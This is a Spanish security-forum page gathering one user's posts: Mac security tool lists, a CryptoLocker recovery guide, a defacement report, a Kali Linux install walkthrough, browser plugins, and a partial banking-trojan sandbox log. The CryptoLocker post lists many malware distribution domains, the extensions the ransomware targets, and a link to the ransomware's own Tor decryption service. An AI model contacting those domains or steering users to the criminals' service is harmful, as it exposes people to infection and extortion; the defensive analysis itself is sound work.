elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: 1 ... 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 [37] 38 39
361  Seguridad Informática / Seguridad / MOVIDO: Herramientas gratuitas de seguridad para MAC en: 26 Noviembre 2013, 17:27 pm
El tema ha sido movido a Mac OS X.

http://foro.elhacker.net/index.php?topic=403646.0
362  Sistemas Operativos / Mac OS X / Herramientas gratuitas de seguridad para Mac OS X en: 26 Noviembre 2013, 12:27 pm
Guía rápida para la descarga de herramientas gratuitas para la seguridad y desinfección de malware.
Herramientas específicas para la plataforma de Mac.
Clasificada por categorías con descarga directa.


Antivirus:

Avast:
Web: http://www.avast.com/es-ww/free-antivirus-mac
D.Directa: http://download.ff.avast.com/mac/avast_free_mac_security.dmg

ClamXav:
Web: http://www.clamxav.com/
iTunes: http://itunes.com/mac/ClamXav
D.Directa: http://www.clamxav.com/downloads/ClamXav_2.7.dmg
Guía: http://www.clamxav.com/documentation.php

Sophos Home Edition:
Web: http://www.sophos.com/es-es/products/free-tools/sophos-antivirus-for-mac-home-edition.aspx
D.Directa: http://downloads.sophos.com/home-edition/savosx_he_r.zip
Checksum: http://downloads.sophos.com/home-edition/savosx_he_r.sha256.txt

Avira Free Mac Security:
Web: http://www.avira.com/es/avira-free-mac-security
D.Directa: http://www.avira.com/es/download-start/product/avira-free-mac-security
           http://install.avira-update.com/package/wks_avira/osx/int/pecl/Avira_Free_Antivirus_for_Mac.pkg
Guía: http://www.avira.com/documents/products/pdf/es/howto_avira_mac_security_en.pdf

VirusBarrier Express:
Web: https://itunes.apple.com/es/app/id411642093?mt=12&affId=332534

Bitdefender Virus Scanner:
Web: http://www.bitdefender.com/solutions/virus-scanner-for-mac.html    
Descarga: https://itunes.apple.com/us/app/bitdefender-virus-scanner/id500154009
Guía: http://download.bitdefender.com/resources/media/materials/2012/en/macfree/datasheet.pdf


Antispyware:

MacScan:
Web: http://macscan.securemac.com/
D.Directa: http://macscan.securemac.com/download/
Info: http://macscan.securemac.com/about/

Dr.Web:
Web: http://www.freedrweb.com/drweb+mac+light/?lng=en
D.Directa: http://download.geo.drweb.com/pub/drweb/mac/Light/drweb-light-606-macosx.dmg
Guía: http://download.geo.drweb.com/pub/drweb/mac/doc/Light/


Firewall:

WaterRoof (amplía funcionalidades del firewall nativo):
Web: http://www.hanynet.com/waterroof/index.html
D.Directa: http://www.hanynet.com/waterroof-3.8.zip

LittleSnitch:
Web: http://www.obdev.at/products/littlesnitch/index.html
D.Directa: http://www.obdev.at/downloads/littlesnitch/LittleSnitch-3.5.dmg


Antirootkit:

OS X Rootkit Hunter:
Web: http://www.christian-hornung.de/
D.Directa: http://www.christian-hornung.de/binary/OS-X-Rootkit-Hunter-0.2.dmg


Optimización y limpieza:

CCleaner:
Web: http://www.piriform.com/mac/ccleaner
D.Directa: http://download.piriform.com/mac/CCMacSetup109.dmg
Guía: http://www.piriform.com/docs/ccleaner-for-mac

Onyx:
Web: http://www.titanium.free.fr/
Descarga: http://www.titanium.free.fr/downloadonyx.php
D.Directa (OS X 10.9): http://joel.barriere.pagesperso-orange.fr/dl/109/OnyX.dmg

Magican:
Web: http://www.magicansoft.com/
D.Directa: http://www.magicansoft.com/download/Magican.pkg
Guía: http://www.magicansoft.com/pdf/magican-user-guide.pdf
 
Maintenance:
Web: http://www.titanium.free.fr/
Descarga: http://www.titanium.free.fr/downloadmaintenance.php
D.Directa (OS X 10.9): http://joel.barriere.pagesperso-orange.fr/dl/109/Maintenance.dmg  


Redes:

Wireshark:
Web: http://www.wireshark.org/
D.Directa (x32): http://www.wireshark.org/download/osx/Wireshark%201.10.5%20Intel%2032.dmg
D.Directa (x64): http://www.wireshark.org/download/osx/Wireshark%201.10.5%20Intel%2064.dmg
Guía: http://www.wireshark.org/docs/

Cocoa Packet Analyzer: Sniffer nativo.
Web: http://www.tastycocoabytes.com/cpa/
D.Directa: http://tastycocoabytes.com/_downloads/CPA_121.dmg
Plugins: http://www.tastycocoabytes.com/cpa/plugins.php

Nmap:
Web: http://nmap.org/download.html#macosx
D.Directa: http://nmap.org/dist/nmap-6.40-2.dmg
Source: http://nmap.org/book/inst-macosx.html#inst-macosx-source
Info: http://nmap.org/book/inst-macosx.html

KisMac:
Web: http://trac.kismac-ng.org/wiki/Downloads
D.Directa: http://update.kismacmirror.com/binaries/KisMAC-0.3.3.dmg
Info: http://trac.kismac-ng.org/wiki

Análisis forense:

OS X Auditor: herramienta gratuita de análisis forense para Mac OS X
Web: https://github.com/jipegit/OSXAuditor
Info: https://github.com/jipegit/OSXAuditor/blob/master/README.md

Plugins navegador:

AVG LinkScanner:
Web: http://free.avg.com/es-es/linkscanner-mac
D.Directa: http://aa-download.avg.com/filedir/inst/avg_lsm_stf_all_2012_1815.dmg

Dr.Web LinkChecker:
Web: http://www.freedrweb.com/linkchecker/safari/
D.Directa: http://download.geo.drweb.com/pub/drweb/linkchecker/Safari/2.0/safari.linkchecker.safariextz

Bitdefender TrafficLight:
Web: http://www.bitdefender.es/solutions/trafficlight.html
D.Directa: http://download.bitdefender.com/npd/trafficlight/extensions/safari/TrafficLight.safariextz

Varios:

FlashbackChecker: Herramienta para eliminar infección por Flashback.
Web: https://github.com/jils/FlashbackChecker/wiki
D.Directa: https://github.com/downloads/jils/FlashbackChecker/FlashbackChecker.1.0.zip
Información: http://support.apple.com/kb/HT5247
Via Updates: http://support.apple.com/kb/HT1338

DNSChanger Trojan Horse:
Web: http://www.dnschanger.com/
D.Directa: http://macscan.securemac.com/files/DNSChangerRemovalTool.dmg

Prey: Encuentra un Mac robado
Web: http://preyproject.com/download
D.Directa: https://s3.amazonaws.com/prey-releases/bash-client/0.6.1/prey-0.6.1-mac.dmg
Info: http://preyproject.com/faq

TrueCrypt:
Web: http://www.truecrypt.org/
D.Directa: http://www.truecrypt.org/download/TrueCrypt%207.1a%20Mac%20OS%20X.dmg
Guía: http://www.truecrypt.org/docs/

Backup: Guía para hacer copias de seguridad en entorno Mac.
Web: http://www.apple.com/es/support/backup/

Consejos de seguridad para tu Mac:
Web: http://blog.segu-info.com.ar/2013/04/12-consejos-de-seguridad-para-tu-mac.html#axzz2lhYAJl8G



Actualizado: 26/12/2014
363  Seguridad Informática / Seguridad / Restaurar archivos cifrados por CryptoLocker [Ransomware] en: 24 Noviembre 2013, 15:13 pm

CryptoLocker Ransomware.

Información:
http://en.wikipedia.org/wiki/CryptoLocker
http://www.us-cert.gov/ncas/alerts/TA13-309A
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2945
http://www.bleepingcomputer.com/virus-removal/cryptolocker-ransomware-information
http://www.kyrus-tech.com/cryptolocker-decryption-engine/

Se han dado casos en los que la recuperación de algunos archivos se hacía imposible, incluso habiendo adquirido legitimamente la clave correcta.
El motivo principal es que se movían los archivos a otra unidad, debido a esto no se recuperaban correctamente.
Se creó este Script para intentar recuperarlos.

http://chief-01.deviantart.com/art/Crypto-Unlocker-UPDATED-V1-1-413774308

Web: https://github.com/appurify/appurify-python/tree/master/pycrypto
D.Directa (x32): https://github.com/appurify/appurify-python/blob/master/pycrypto/pycrypto-2.6.win32-py3.3.exe
D.Directa (x64): https://github.com/appurify/appurify-python/blob/master/pycrypto/pycrypto-2.6.win-amd64-py3.3.exe

Web: https://github.com/kyrus/crypto-un-locker
Script: https://github.com/kyrus/crypto-un-locker/blob/master/CryptoUnLocker.py



Es posible extraer la clave privada desde el registro (HKCU\Software\CryptoLocker) a archivo .reg y guardar donde ejecutes el Script.

Otra opción (automatizada) para restaurar los archivos cifrados:

Panda Ransomware Decrypt:
Web: http://www.pandasecurity.com/spain/homeusers/support/card?id=1675
D.Directa: http://www.pandasecurity.com/resources/tools/pandaunransom.exe
Guía: http://www.pandasecurity.com/spain/homeusers/support/card?id=1675


CryptoLocker Decryption Service (Servicio online):

Usar Tor2web (http://tor2web.org) o TorBrowser (https://www.torproject.org/download/download) para entrar:

Link directo desde Tor2web:
https://f2d2v7soksbskekh.tor2web.org


Herramienta que buscará los archivos que han sido cifrados:

CryptoLocker Scan Tool (necesario NET 4.5):
Web: http://omnispear.com/tools/cryptolocker-scan-tool
D.Directa: https://www.dropbox.com/s/ciw1rdzri8ghyfo/OCF_20131025.zip


Otros metodos para tratar de restaurar los archivos afectados, aunque no se garantiza nada:

Se puede tratar de restaurar versiones anteriores de estos archivos usando una funcionalidad integrada de Windows o una aplicación conocida como ShadowExplorer.

- Obtención de los archivos de nuevo el uso de la funcionalidad de versiones anteriores.
Windows tiene una característica nativa, donde se puede hacer clic derecho sobre un archivo, seleccione Propiedades y seleccione la pestaña llamada versiones anteriores. Una vez hecho esto para un archivo en particular, verá todas las versiones de la misma que se copiaron y se almacenan en el llamado Volume Shadow Copy. La ficha también proporciona la historia de estas copias de seguridad por fecha.
Con el fin de restaurar la versión necesaria del archivo, haga clic en el botón Copiar y luego elegir la ubicación en la que este archivo va a ser restaurada. En caso de que usted desea reemplazar el archivo existente con su versión restaurada, haga clic en el botón Restaurar en su lugar. Puede restaurar carpetas enteras de la misma manera.

- Restauración de archivos cifrados con la utilidad ShadowExplorer:
Además de la funcionalidad nativa de Windows, puede utilizar una aplicación que puede restaurar la versión anterior de carpetas enteras para usted. Se llama ShadowExplorer. Una vez que descargue y ejecute este programa, mostrará todas las unidades, así como una lista de las fechas en que se generaron las instantáneas. Sólo tiene que elegir la unidad y la fecha para la restauración deseada

Web: http://www.shadowexplorer.com
D.Directa: http://www.shadowexplorer.com/uploads/ShadowExplorer-0.9-setup.exe


Herramientas de ayuda a la prevención contra CryptoLocker:

CryptoPrevent (Beta):
Web: http://www.foolishit.com/vb6-projects/cryptoprevent/
D.Directa: http://www.foolishit.com/download/cryptoprevent-installer/
D.Directa (portable): http://www.foolishit.com/download/cryptoprevent/



Cryptolocker Prevention Kit:
Web: http://www.thirdtier.net/2013/10/cryptolocker-prevention-kit-updates/
D.Directa: http://www.thirdtier.net/downloads/CryptolockerPreventionKit.zip

HitmanPro's CryptoGuard:
Web: http://www.surfright.nl/en/alert/cryptoguard
D.Directa: http://dl.surfright.nl/hmpalert25.exe
Video demostrativo: http://www.youtube.com/watch?feature=player_embedded&v=5M8YYnXIAlw

Se adjuntan varios programas que ayudarán a eliminar la infección automáticamente, a pesar de como se ha comentado los ficheros
aún seguirán cifrados.

Malwarebytes antimalware:
- Web: http://es.malwarebytes.org/
- D.Directa: http://es.malwarebytes.org/mwb-download

Hitman Pro:
- Web: http://www.surfright.nl/en/downloads/
- D.Directa (32 bits): http://dl.surfright.nl/HitmanPro.exe
- D.Directa (64 bits): http://dl.surfright.nl/HitmanPro_x64.exe
- Guía pdf: http://files.surfright.nl/hmp-brochure-en.pdf


* Por lo que he podido ver, tan solo van cambiando el nombre al dominio, dejando el nombre final de ejecutable como "1002.exe" (http:/[random]/1002.exe)
Domains:
Citar
Object URL   # Requests   
wqvnkgtquoixx.com/home/   
jbkoqywkqjpjji.net/home/   
keqrmonphudew.net/home/   
miuongoruxtuhy.biz/home/   
qipixdjsccnyc.biz/home/   
pfasmsxcpsfkle.biz/home/   
evkmaldroiifk.ru/home/   
saallnwetwuac.org/home/   
ygvnalgjbukky.info/home/   
aiqyntcdnvfyy.com/home/   
bxgqnvtusprlg.net/home/   
cabcbepofqmaw.biz/home/   
upalbsjwadwmy.ru/home/   
qtnwayrgotgvf.info/home/   
trusflrovxooa.ru/home/   
vruwobfqmerby.org/home/   
nqjfxvpobfgss.net/home/   
otauuhgyfkeyx.info/home/   
xjfaclsceyycp.info/home/   
rjydbnflxdqfo.com/home/   
fyafqsphgcwpn.net/home/   
sejfjeaeybkcf.biz/home/   
suiqcimovbpqnc.info/home/   
gtkhyjkahaqmn.ru/home/   
pyduriwnnvmyh.org/home/   
hjivfvfffwnskq.net/home/   
ejoypeccwsmgn.com/home/   
aejmsdjdnlxpo.net/home/   
ligpryhpqpdwne.com/home/   
bikasivqvqovf.biz/home/   
bytobtevojrmf.ru/home/   
uycjwfvptmknld.com/home/   
cducbyqjwoisf.org/home/   
yxorjdnsljkpj.info/home/   
yoxgrovxecngq.com/home/   
ottxtmpqbfivg.biz/home/   
vvopcjmnxbhbwc.ru/home/   
asytrtilmhemq.net/home/   
gctqpdxpmfmir.biz/home/   
juuquupfwkohs.biz/home/   
bryjvxpmikgjtg.ru/home/   
itetdtsollwar.org/home/   
rspqurslksuqf.info/home/   
kdfwnedtksawjy.biz/home/   
etrwsvkcdukdlg.ru/home/   
erxigxprcxick.info/home/   
rhykvgjqlqkis.com/home/   
gjiltokqbestr.net/home/   
tyjnjwepkwuaq.biz/home/   
oweahscscnpoo.ru/home/   
taesdijrndsatw.org/home/   
pbfnhbxmlmkyo.org/home/   
mmirxnturglis.com/home/   
oesuleotqmvaa.biz/home/   
pitilmknalqkq.ru/home/   
iigcbmauiqvfba.ru/home/   
fuoxdmpthwgih.org/home/   
gpyalwdsbfdvf.info/home/   
tfacbcnojejgn.com/home/   
besvehfusgclh.net/home/   
cydxmrstmoyyx.ru/home/   
poeacwdpunfjg.org/home/   
qydbouvxduubsr.ru/home/   
okjjdmhkqnkgf.com/home/   
pokwdrtxysbmf.net/home/   
yeiviemnuxabpv.com/home/   
ooltxrisjwradh.org/home/   
jydfvwjmiojvs.biz/home/   
kdesvcvaqtacj.ru/home/   
ktnhehwlcwgjj.org/home/   
tnjlrciuvwfam.info/home/   
hdknhkctfphgu.com/home/   
vftofmvgnrmbt.net/home/   
pwnjswxvhgbdm.ru/home/   
lyooqnqqhotjju.biz/home/   
lohwjyiyqkwfqi.info/home/   
mclqdpsghdjqje.ru/home/   
dmolifruqydju.org/home/   
feyovpfgitkkl.info/home/   
citujrmxlfigj.com/home/   
dmuijairuedqj.net/home/   
eaexwcajdaphq.biz/home/   
feflwkvdmykrh.ru/home/   
xrxskmcywoeju.org/home/   
ajivxwpkojlku.info/home/   
odfkpkipydkslh.net/home/   
bnjjxflexigul.com/home/   
ryyyyfgfvtsnct.info/home/   
mnfdfpdotefros.net/home/   
uwdykbjtyjnkje.biz/home/   
vvbfgrejcdvwje.org/home/   
ggltstdpfixlmg.com/home/   
ttgwxyheyuxdud.net/home/   
laqigkmwntydsb.biz/home/   
xarbteoehyyaik.net/home/   
myoocbhmqnhpjy.org/home/   
opalnungbnmmot.org/home/   
jxvaxrprklbjlm.info/home/   
kaqiuwvbeulwci.com/home/   
yvbswhukhiskve.net/home/   
kwtgtikhnfjvjl.net/home/   
nkbxareutxbqjc.ru/home/   
bxvbfarpkqqerj.org/home/   
dttreqmrlsedie.info/home/   
neegqpcrrrqvut.biz/home/   
tspwdnloqrybym.com/home/   
rbjkbglbcucwua.org/home/   
ksxfginiuiagub.info/home/   
twhbawgddwpvuw.info/home/   
fkccpkpsimeybd.com/home/   
pyocsnovymedni.net/home/   
qbjkpveipcyunx.biz/home/   
kmwxovbjqgjmad.com/home/   
rumsrejxaorcum.ru/home/   
ffbxddujmmpsxl.biz/home/   
swhbomykqemtll.org/home/   
sxwfupthcyeqjh.net/home/   
cpgpwafuancriy.org/home/   
adjkrhdkuxysov.biz/home/   
nqenwmhyokyknc.ru/home/   
bxjlbrafmvaobr.ru/home/   
bchqnrqmbdkvfl.org/home/   
icmiuojikeeglw.info/home/   
jehqrtprenotca.com/home/   
fvmfpbqlweuqcc.org/home/   
lwfhkayvijlhld.info/home/   
guklllendjgtct.info/home/   
avprsocmlqjigs.ru/home/   
gecmmdcdjwpjlp.org/home/   
iaadlnplnoarlk.info/home/   
rpayeuhoyexfpe.net/home/   
vnugqvdgehpfkw.com/home/   
rbxjldlktkpsjx.org/home/   
mqipmcwrvlbxlw.com/home/   
nsdxjkmembvpcv.net/home/   
gkdtedfdjppeuj.ru/home/   
nqcfresqxteaxk.biz/home/   
bgdeqjwfchhvwq.ru/home/   
tvelvheabunfpq.biz/home/   
adgceuhdxrinww.biz/home/   
vukflsvgxbgvui.ru/home/   
wylroxcpcqgjle.org/home/   
xxjxkowffkovlp.info/home/   
uwqjgsrxuhyopp.net/home/   
jdtwkyaduxkmve.com/home/   
erbxffpmhwjmwq.com/home/   
urndyegetlhnwl.biz/home/   
truhmarggnfawj.org/home/   
vnsxlqmihpsywr.info/home/   
tlxpdlcqaglewt.ru/home/   
hbyoctplnodrvn.org/home/   
daetjwkwtfhjwj.info/home/   
fvckinfyuhuinp.net/home/   
atiyxjksylosbu.biz/home/   
xiyefnrwyvdcth.com/home/   
lrvlcsbkbnljsx.net/home/   
yhwkbxfyfbofbu.biz/home/   
uycyyswttiedtd.info/home/   
swgfawqxupccrf.com/home/   
tbhrdcwhyfcpib.net/home/   
uafxymkjfknspa.ru/home/   
pnjatcvupcddtl.info/home/   
qrkmwhcetrdqtc.com/home/   
qtqhbembdaeyrl.net/home/


** Se me ocurrió que para tener a salvo archivos importantes en cualquier unidad de disco, se podría modificar la extensión real del fichero por una inventada.
Tanto en variantes como en nuevas versiones se infectan extensiones de archivos conocidas.

Citar
*.odt, *.ods, *.odp, *.odm, *.odc, *.odb, *.doc, *.docx, *.docm, *.wps, *.xls, *.xlsx, *.xlsm, *.xlsb, *.xlk, *.ppt, *.pptx, *.pptm, *.mdb, *.accdb, *.pst, *.dwg, *.dxf, *.dxg, *.wpd, *.rtf, *.wb2, *.mdf, *.dbf, *.psd, *.pdd, *.eps, *.ai, *.indd, *.cdr, ????????.jpg, ????????.jpe, img_*.jpg, *.dng, *.3fr, *.arw, *.srf, *.sr2, *.bay, *.crw, *.cr2, *.dcr, *.kdc, *.erf, *.mef, *.mrw, *.nef, *.nrw, *.orf, *.raf, *.raw, *.rwl, *.rw2, *.r3d, *.ptx, *.pef, *.srw, *.x3f, *.der, *.cer, *.crt, *.pem, *.pfx, *.p12, *.p7b, *.p7c

Si tenemos un documento .pdf por ejemplo y es de valor por ser una trabajo o proyecto, podemos cambiar solo la extensión a documento.xx,
por lógica el malware no haría la modificación de cifrado al archivo.
El creador del ransomware puede decirle al programa que tipo de extensión cifrar pero no podría infectar toda extensión de archivo
existente. Bueno poder podría, pero no le sería de mucha utilidad si la finalidad es puramente economica.

Saludos.
364  Foros Generales / Noticias / Deface a Forospyware por segunda vez en: 16 Agosto 2013, 00:28 am
Hola comentaros que han defaceado Forospyware de la misma forma que hace un par de años, y por el mismo haxor o grupo :o

Si quereis ver el deface de hace un par de años, se documentó en el foro de Skapunky:
http://killtrojan.forum6.biz/t777-modificaciones-ajenas-en-el-server-de-forospyware

Si quereis ver una captura del actual desde la caché aun se puede ver:
http://webcache.googleusercontent.com/search?q=cache:MNlzrkzGgKQJ:www.forospyware.com/windows-7/index208.html+&cd=1&hl=es&ct=clnk&gl=es&client=firefox-a

Mensaje:

Citar
~ Hi Master ~

Hacked by | Egyptian.H4x0rZ

Gr33tz to : Hcj - Cyber-1st - h311 c0d3

#Hackers r0x Lamerz Sux

#Contact : Twitter.com/1337blackhat

#Nobody listens until you say something wrong

G00d bye

Fecha: jueves, 15 de agosto de 2013





De momento no está solucionado, el server está OFF y no hay acceso, ya irán informando desde su twiter.

Saludos.
365  Sistemas Operativos / GNU/Linux / Kali Linux - A project of Offensice Security en: 5 Abril 2013, 04:04 am
Hola hoy me dispuse a instalar y probar bajo VirtualBox la nueva distro de Offensive Security Kali Linux:

Capturas de instalación:

Elección del idioma:








Contraseña:


Configuración de zona horaria:


Formas de particionado del disco:


En mi caso elegí la configuración de LVM (Logical Volume Manager) de forma cifrada:


- Guiado – utilizar todo el disco: el asistente creará dos particiones (raíz y swap).
- Guiado – utilizar el disco completo y configurar LVM: se crea una partición de arranque (boot) y un volumen físico que contendrá dos volúmenes lógicos (raíz y swap).
- Guiado – utilizar todo el disco y configurar LVM cifrado: igual que el anterior pero en este caso se cifra el volumen lógico que contiene la raíz.
- Manual: nos permite particionar como queramos. Con o sin LVM, cifrando o sin cifrar y creando el número de particiones que necesitemos.

Particionando el disco:


Puedes elegir la primera opción en caso de duda, hará todo de forma automática:


Configurando el particionado:




Cifrando la partición, elegir una contraseña robusta:






Confirmar los cambios a realizar en particiones:





Web: http://www.kali.org/
Foro: http://forums.kali.org/forum.php?s=d22fdfb4025d98fdbb4026e6ee76c19c
Documentación: http://www.kali.org/news/kali-linux-whats-new/
Descarga: En el casillero "Window Manager" podemos ver dos opciones la ISO completa y una versión Lite de 20 MB (X32) y 23 MB (x64) que aún no he probado, disponible para ambas arquitecturas.

32 bits:
D.Directa: http://archive-4.kali.org/kali-images/kali-linux-1.0.2-i386.iso
Filename: kali-linux-1.0.2-i386.iso
sha1sum: ae6e3adcabed1c73689ff1da58c67183b435acf6
Size (MB): 2418

64 bits:
D.Directa: http://archive-4.kali.org/kali-images/kali-linux-1.0.2-amd64.iso
Filename: kali-linux-1.0.2-amd64.iso
sha1sum: 95070bb6fb078bd46e333914920eed6c708fcea4
Size (MB): 2327

Al final no pude instalarlo en en pc donde tengo las virtuales por problemas de compatibilidad con el tipo de procesador y lo instalé en el portátil, ahí se ejecutó sin problemas.
Adjunto las capturas, el estilo me gustaba más el de Backtrack:











Saludos.
366  Seguridad Informática / Seguridad / Plugins para los navegadores (FF, IE, O, M, CD, S) en: 20 Febrero 2013, 00:03 am
Listado actualizado de complementos para los navegadores:

Firefox: https://addons.mozilla.org/es/firefox/

Descargar Firefox: http://www.mozilla.org/es-ES/firefox/fx/

NoScript: https://addons.mozilla.org/es/firefox/addon/noscript/?src=cb-dl-mostpopular
Wot: https://addons.mozilla.org/es/firefox/addon/wot-safe-browsing-tool/?src=cb-dl-mostpopular
Adblock Plus: https://addons.mozilla.org/es/firefox/addon/adblock-plus/?src=cb-dl-mostpopular
AdblockPlus Pop-upAddon: https://addons.mozilla.org/es/firefox/addon/adblock-plus-pop-up-addon/?src=cb-dl-mostpopular
Ghostery: https://addons.mozilla.org/es/firefox/addon/ghostery/?src=cb-dl-mostpopular
Better Privacy: https://addons.mozilla.org/es/firefox/addon/betterprivacy/?src=cb-dl-mostpopular
NOGoogleAnalytics: https://addons.mozilla.org/es/firefox/addon/no-google-analytics/?src=cb-dl-recentlyadded
DuckDuckGo Search: https://addons.mozilla.org/es/firefox/addon/duckduckgo-for-firefox/?src=cb-dl-featured

** Si instalas muchos plugins en Firefox puede consumir mucha memoria, se aconseja instalar MemoryFox:
MemoryFox: https://addons.mozilla.org/es/firefox/addon/memory-fox/


Internet Explorer: http://www.iegallery.com/PinnedSites

Descargar Internet Explorer: http://ie9.discoverbing.com/intl/es-xl/index.html

Dr.Web LinkChecker: http://www.freedrweb.com/linkchecker/internet+explorer/
Wot: http://www.mywot.com/es/download/ie
McAfee Site Advisor: https://sadownload.mcafee.com/products/SA/Website/saSetup.exe
G-Data Cloud Security: https://www.gdata.de/?eID=PushFile&dl=deea11a7a2%3AAFIGDQY%3D
:


Google Chrome: https://chrome.google.com/webstore/

Descargar Google Chrome:

Adblock Plus: https://chrome.google.com/webstore/detail/adblock-plus/cfhdojbkjhnklbpkdaibdccddilifddb?hl=es
DuckDuckGo: https://chrome.google.com/webstore/detail/duckduckgo-for-chrome/bpphkkgodbfncbcpgopijlfakfgmclao?hl=es
Wot: https://chrome.google.com/webstore/detail/wot/bhmmomiinigofkjcapegjjndpbikblnp?hl=es
GeoProxy: https://chrome.google.com/webstore/detail/geoproxy/pooljnboifbodgifngpppfklhifechoe?hl=es
Click&Clean: https://chrome.google.com/webstore/detail/clickclean/ghgabhipcejejjmhhchfonmamedcbeod?hl=es
DoNotTrackMe: https://chrome.google.com/webstore/detail/donottrackme/epanfjkfahimkgomnigadpkobaefekcd?hl=es
Webmail AdBlocker: https://chrome.google.com/webstore/detail/webmail-ad-blocker/cbhfdchmklhpcngcgjmpdbjakdggkkjp?hl=es
Webutation: https://chrome.google.com/webstore/detail/webutation/nfclfmabiojpommfcalfdgjjeaahnjbj?hl=es
MetaSurf: https://chrome.google.com/webstore/detail/metasurf/dpfbddcgbimoafpgmbbjiliegkfcjkmn?hl=es
Dr.WebAnti-Virus Link Checker: https://chrome.google.com/webstore/detail/drweb-anti-virus-link-che/aleggpabliehgbeagmfhnodcijcmbonb?hl=es
HideMyAss! WebProxy: https://chrome.google.com/webstore/detail/hide-my-ass-web-proxy/cmgnmcnlncejehjlnhaglpnoolgbflbd?hl=es
Bitdefender QuickScan: https://chrome.google.com/webstore/detail/bitdefender-quickscan/pdnkcidphdcakpkheohlhocaicfamjie?hl=es
javascript PopupBlocker: https://chrome.google.com/webstore/detail/javascript-popup-blocker/hiajdlfgbgnnjakkbnpdhmhfhklkbiol?hl=es
FoxyProxy Standard: https://chrome.google.com/webstore/detail/foxy-proxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp?hl=es
Traffic Light: https://chrome.google.com/webstore/detail/trafficlight/cfnpidifppmenkapgihekkeednfoenal?hl=es
Qualys BrowserCheck: https://chrome.google.com/webstore/detail/qualys-browsercheck/ejhnkognlohdkpjkjongioociddgoibk?hl=es
SafeGmail: https://chrome.google.com/webstore/detail/safegmail/lmjkmpdndmbieflefonjgnnfimmkbedf?hl=es
SurfPatrol: https://chrome.google.com/webstore/detail/surfpatrol/jkppgpkggbadgdkdjephjfpmblapdcpb?utm_source=chrome%20-ntp-icon


Opera: https://addons.opera.com/es/

Descargar Opera: http://www.opera.com/download/

Adblock Plus: https://addons.opera.com/es/extensions/details/opera-adblock/?display=en
Wot: https://addons.opera.com/es/extensions/details/wot/?display=es
Dr.Web Link Checker: https://addons.opera.com/es/extensions/details/drweb-link-checker-2/?display=es
Ghostery: https://addons.opera.com/es/extensions/details/ghostery/?display=en
NotScripts: https://addons.opera.com/es/extensions/details/notscripts/?display=en
NoAds: https://addons.opera.com/es/extensions/details/noads/?display=en
NoAds Advanced: https://addons.opera.com/es/extensions/details/noads-advanced/?display=es
DuckDuckGo: https://addons.opera.com/es/extensions/details/duckduckgo-for-opera-2/?display=en


Safari:

Descarga Safari: http://support.apple.com/kb/DL1531?viewlocale=es_ES

Wot: http://www.mywot.com/files/downloads/wot-20100712.safariextz
javascript Blocker: http://dl.dropbox.com/u/11967/JS%20Blocker.safariextz
AdBlock Plus: http://safariadblock.com/AdBlockForSafari.safariextz
Dr. Web Link Checker: http://download.geo.drweb.com/pub/drweb/linkchecker/Safari/2.0/safari.linkchecker.safariextz
Traffic Light: http://download.bitdefender.com/npd/trafficlight/extensions/safari/TrafficLight.safariextz
Ghostery: http://www.ghostery.com/safari/Ghostery.safariextz
Incognito: http://www.orbicule.com/incognito/Incognito.safariextz
Cookie stumbler: http://www.writeitstudios.com/extensions/Cookie%20Stumbler.safariextz


Maxthon: http://extension.maxthon.com/

Descarga Maxthon: http://es.maxthon.com/

:
:
:
:
:
:


Comodo Dragón: https://chrome.google.com/webstore/category/extensions

Descargar Comodo Dragón: http://www.comodo.com/dragon/intl/en-GB/browserchoice/index.html?track=1870

Trabaja con los mismos plugins de Chrome, aunque los navegadores son diferentes.
Dragón incluye dos modulos de seguridad: Comodo Share Page Service y Comodo Web Inspector.


** En construcción, si teneis más complementos para añadir en cualquier navegador comentar en este tema.

Saludos.

Actualizado: 20.02.2013
367  Seguridad Informática / Análisis y Diseño de Malware / Troyano bancario II (diferente configuración). en: 16 Febrero 2013, 14:34 pm
Del mismo contacto de correo recibo otra muestra, actúa de forma diferente y descarga una buena batería de archivos.
En esta ocasión analicé el ejecutable mediante "Buster Sandbox".

URL: Pedir por MP.

Análisis online:

Comprovante.pdf.exe:
Virutotal: https://www.virustotal.com/file/a8dd1f76473cb69e7012964a5d723cb81014a13413df572735c7ae28b9e297cd/analysis/1360255230/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1a9a78b746cd486e4adb6aa28bdf02761&call=first

Archivos descargados:

jjca.dll:
Virutotal: https://www.virustotal.com/file/fa3651cfcd2aca6c7303ef8017986669465b724dc96ceaddcb249f66b487d420/analysis/1360254397/
Anubis: http://anubis.iseclab.org/?action=result&task_id=18c69386fee0475e4d56e22cb9bc33ac6

jsob.exe:
Virutotal: https://www.virustotal.com/file/d4ae23bf307150d9fd664eaac06bcce9d2101d946089a506b25f3f84d8248a8e/analysis/1360254575/
Anubis:

jsobs.exe:
Virutotal: https://www.virustotal.com/file/e914bda041273705403f2a968f557f67053b609daae77ca37c05f97d922a9261/analysis/1360254739/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1d19bec75e40ba5e461ef3b2548210e08

Projeto.exe:
Virutotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360254942/
Anubis: http://anubis.iseclab.org/?action=result&task_id=161f701d97b086d7421afd1ae0c2ba446

winsa64.exe:
Virutotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360255019/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1abaf0d0a6553c1e4bda858417f3f38f7&call=first

Compresión y compilado:





Ejecución de Comprovante.pdf.exe:

Código:
Executing: c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
